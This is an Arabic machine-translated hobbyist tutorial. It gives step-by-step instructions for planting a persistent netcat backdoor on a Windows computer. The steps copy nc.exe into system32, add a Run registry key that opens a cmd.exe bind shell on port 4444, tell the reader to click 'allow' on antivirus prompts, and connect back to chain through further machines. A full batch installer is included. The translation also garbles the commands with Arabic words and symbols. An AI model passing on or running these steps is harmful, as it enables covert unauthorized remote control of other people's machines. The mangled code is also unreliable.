نت كات فن: 5 خطوات

2024 مؤلف: John Day | [email protected]. آخر تعديل: 2024-01-30 07:41

يوضح لك هذا التوجيه كيفية إنشاء باب خلفي على جهاز كمبيوتر باستخدام netcat! سأوضح لك طريقتين للقيام بذلك ، مع وبدون ملف دفعي الخاص بي الذي يقوم بأتمتة ذلك بالنسبة لك. يفترض هذا التوجيه بالفعل أن لديك بالفعل أذونات الجذر على الكمبيوتر ، ربما باستخدام 0phcrack LiveCD هنا. الآن ، على التعليمات.

الخطوة 1: قم بتنزيل Netcat

لقد وفرت عليك مشكلة 3 دقائق من البحث في Google وقمت بوضع nc.exe على تعليمات لتنزيلها. اختياريًا ، يمكنك أيضًا تنزيل nc.bat وهو ملف دفعي قمت بإنشائه لأتمتة العملية نيابة عنك. تأكد من أنه إذا قمت بتنزيل nc.bat ، فسيبلغ حجمه 464 بايت ، لأنني واصلت تحميل الإصدارات واكتشاف خطأ ما فيها. إذا لم يكن 464 بايت ، فلن يتوافق البرنامج مع هذه التعليمات.

الخطوة 2: مع Nc.bat

أولاً ، يجب أن يكون كلا الملفين في نفس الدليل حتى يعمل nc.bat بشكل صحيح. أقترح استخدام محرك أقراص فلاش أو قرص مضغوط لهذه العملية. لقد استخدمت محرك أقراص فلاش سعته 512 ميجابايت لهذا الغرض ، ولكن هذا أنا فقط. لذا ، انسخ الملفات على جهاز الوسائط الخارجية ، وقم بإحضارها إلى جهاز الكمبيوتر الذي لديك جذر عليه. احصل على جهاز الوسائط وانقر نقرًا مزدوجًا فوق nc.bat. سيؤدي هذا إلى نسخ ملف nc.exe إلى مجلد system32 ، في جذر النظام (عادةً C: / Windows أو C: / WINNT) وإجراء التغييرات اللازمة على التسجيل. ثم اكتب عنوان IP. سيكون شيئًا مثل "192.168.1.103" ، وهو لي. بمجرد الانتهاء من ذلك ، أعد تشغيل الجهاز وقم بتسجيل الدخول. ثم قد يسألك برنامج مكافحة الفيروسات عما إذا كنت تريد السماح / عدم السماح للبرنامج. انقر فوق "السماح" أو ما شابه. ضع في اعتبارك أنه في هذا الدليل ، يمكنك فقط الاتصال عبر شبكة الاتصال من الشبكة المحلية لهذا الكمبيوتر. ثم غادر ، أو سجل الخروج ، أو أي شيء آخر تريده.

الخطوة 3: بدون Nc.bat

للقيام بذلك ، يجب أن يكون لديك nc.exe على قرص مضغوط أو محرك أقراص فلاش. انتقل إلى الكمبيوتر ، وقم بتسجيل الدخول ، وقم بتوصيل محرك أقراص فلاش أو ضع القرص المضغوط الخاص بك. من هنا ، هناك طريقتان: واجهات المستخدم الرسومية المصقولة للنوافذ ، أو الطريقة القديمة القذرة لموجه الأوامر. طريقة موجه الأوامر القديمة: اسحب موجه الأوامر بالانتقال إلى StartRun واكتب:

cmd.exeانتقل في طريقك إلى الفلاش أو محرك الأقراص المضغوطة. إذا كنت لا تعرف أي محرك أقراص ، فانقر بزر الماوس الأيمن على زر البدء وانقر فوق استكشاف. انقر فوق جميع محركات الأقراص غير المحلية في "جهاز الكمبيوتر" حتى تصل إلى محرك أقراص فلاش / قرص مضغوط. تذكر حرف محرك الأقراص والعودة إلى موجه الأوامر. اكتب حرف محرك الأقراص متبوعًا بنقطتين ، مثل هذا: K: ثم اكتب سطرًا واحدًا في كل مرة ، متبوعًا بضغط مفتاح الإرجاع

نسخ nc.exe٪ systemroot٪ / system32 / nc.exereg إضافة HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "٪ systemroot٪ / system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "كان هذا التثبيت إلى حد كبير. كل ما تحتاج إلى معرفته الآن هو عنوان IP المحلي ، والذي يمكن العثور عليه بسهولة عن طريق كتابة الأمر "ipconfig" والبحث عن شيء في الجدول مثل "192.168.1.103". ثم أعد تشغيل الجهاز وسجل الدخول مرة أخرى. قد يسألك برنامج مكافحة الفيروسات عما إذا كنت تريد السماح / عدم السماح. انقر فوق السماح. إذن فأنت حر في فعل ما تريد بالكمبيوتر واجهات رسومية مصقولة لنظام التشغيل Windows انقر بزر الماوس الأيمن على زر ابدأ وانقر فوق استكشاف. انقر فوق جميع محركات الأقراص غير المحلية في "جهاز الكمبيوتر" حتى تصل إلى محرك أقراص فلاش / قرص مضغوط. ثم انقر بزر الماوس الأيمن فوق nc.exe وانسخ. ثم انتقل إلى محرك الأقراص C وانقر فوق مجلد Windows أو WINNT. ثم انتقل إلى مجلد system32 والصق nc.exe. أغلق ذلك ، وانتقل إلى StartRun. اكتب رجديت. انتقل عبر المجلدات إلى: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run ثم انقر بزر الماوس الأيمن فوق مساحة فارغة وانتقل إلى NewString Value. اكتب ما تريده للاسم ، ولكن للقيمة ، اكتب

٪ systemroot٪ / system32 / nc.exe -L -d -p 4444 -t -e cmd.exeكان هذا التثبيت إلى حد كبير. كل ما تحتاج إلى معرفته الآن هو عنوان IP المحلي ، والذي يمكن العثور عليه بسهولة عن طريق كتابة الأمر "ipconfig" في موجه الأوامر (StartRun: cmd.exe) والبحث عن شيء ما في الجدول مثل "192.168.1.103". ثم أعد تشغيل الجهاز وسجل الدخول مرة أخرى. قد يسألك برنامج مكافحة الفيروسات عما إذا كنت تريد السماح / عدم السماح. انقر فوق السماح. إذن فأنت حر في أن تفعل ما تريد بالكمبيوتر.

الخطوة 4: العودة للداخل

بمجرد تثبيته ، وتريد التحكم في المضيف ، افتح موجه الأوامر أو PuTTY. أعتقد أن PuTTY رائع ، لذا سأسمح لك بتنزيله هنا باستخدام PuTTYD قم بتنزيل وفتح PuTTY.exe. انقر فوق بروتوكول "خام". في مربع نص المنفذ رقم ، اكتب 4444. في مربع "عنوان المضيف" ، اكتب عنوان IP الذي كتبته أثناء التثبيت. ثم اضغط دخول. يجب أن يتصل PuTTY بالمربع وستحصل على موجه أوامر. باستخدام موجه الأوامر ، افتح موجه الأوامر واكتب telnet 4444 ، ثم اضغط على Enter ، وستحصل على موجه الأوامر. سيتيح لك ذلك فعل أي شيء تريده تقريبًا للكمبيوتر عن بُعد والذي يمكنك القيام به باستخدام حساب محلي. يصبح الأمر مثيرًا للاهتمام حقًا عندما تدخل إلى جهاز كمبيوتر ، ثم تدخل إلى جهاز كمبيوتر آخر من هذا الكمبيوتر ، لتوصيل سلسلة كاملة من أجهزة الكمبيوتر معًا. استمتع (قانونيًا)!

الخطوة 5: كود المصدر

نظرًا لأنه تم سؤالي ، سأضع الكود المصدري (للملف الدفعي) وأشرح كل أمر وماذا يفعل. كن حذرا! هذا هو الإصدار الحالي من برنامج التثبيت الدفعي. إذا كان رمزك مختلفًا ، فسيختلف الرمز.

echo offcopy nc.exe٪ systemroot٪ / system32 / nc.exe إذا كان مستوى الخطأ 0 goto regeditgoto خطأ: regeditreg إضافة HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "٪ systemroot٪ / system32 / nc. exe -L -d -p 4444 -e cmd.exe "إذا حدث خطأ غير متوقع 0 goto ip: errorecho حدث شيء غير متوقع ، ويحتاج البرنامج إلى الخروج. goto end: ipecho اكتب عنوان IP من tableipconfig: endecho end.echo duct tape out.pauseيخبرecho off-أنه لا يعرض الأوامر عند تنفيذ التنفيذ.نسخ nc.exe٪ systemroot٪ / system32 / nc.exe- عادةً ما ينسخ netcat إلى C: / WINDOWS / system32. هذا يجعل الأمر كذلك عند العودة ، بدلاً من تغيير الدلائل طوال الوقت ، يمكنك فقط كتابة "nc" لفتح منفذ آخر.إذا كان مستوى الخطأ 0 ، انتقل إلى فحص أخطاء رجديت. إذا كانت النسخة ناجحة ، فستستمر في تحرير السجل..reg إضافة HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run / f / v nc / d "٪ systemroot٪ / system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" - (من المفترض أن كن سطرًا واحدًا) يضيف مفتاح التسجيل لإعادة تشغيل البرنامج عند إعادة التشغيل. / f يعني الكتابة فوق المفتاح الموجود ، / v لاسم المفتاح ، / d للبيانات. يتم إدخال باقي العلامات لـ netcat. -L يقول إعادة تشغيله عند الخروج ، لذلك لا يتعين عليك الانتظار حتى إعادة تشغيل الكمبيوتر. - لقد نسيت. يحدد -p 4444 المنفذ #. لقد نسيت. -e cmd.exe يجعل موجه الأوامر يبدأ عند الاتصال عن بعد. إذا كان errorlevel 0 goto ip-error check. إذا حدث خطأ في التشغيل ، فسوف يتخطى هذا السطر وينزل إلى: error label.echo حدث شيء غير متوقع ، ويحتاج البرنامج إلى الإنهاء. - يخبر البرنامج ليطبع "حدث شيء غير متوقع ، ويحتاج البرنامج إلى الخروج "على الشاشة. goto end - إذا انتقلت إلى رسالة الخطأ ، حدث خطأ ما ويحتاج البرنامج إلى الإغلاق على أي حال. عنوان من الجدول "إلى screen.ipconfig- هذا هو الأمر الذي يطبع معلومات حول إعدادات شبكة المنطقة المحلية (LAN) الخاصة بك.: end-Label.echo end.- يكتب" end "إلى screen.echo duct tape out. - يكتب "duct tape out" إلى screen.pause - يوقف هذا الأمر البرنامج مؤقتًا ، وينتظر أن يضغط المستخدم على مفتاح. في هذا البرنامج ، ينتظر الإدخال ثم يخرج من البرنامج.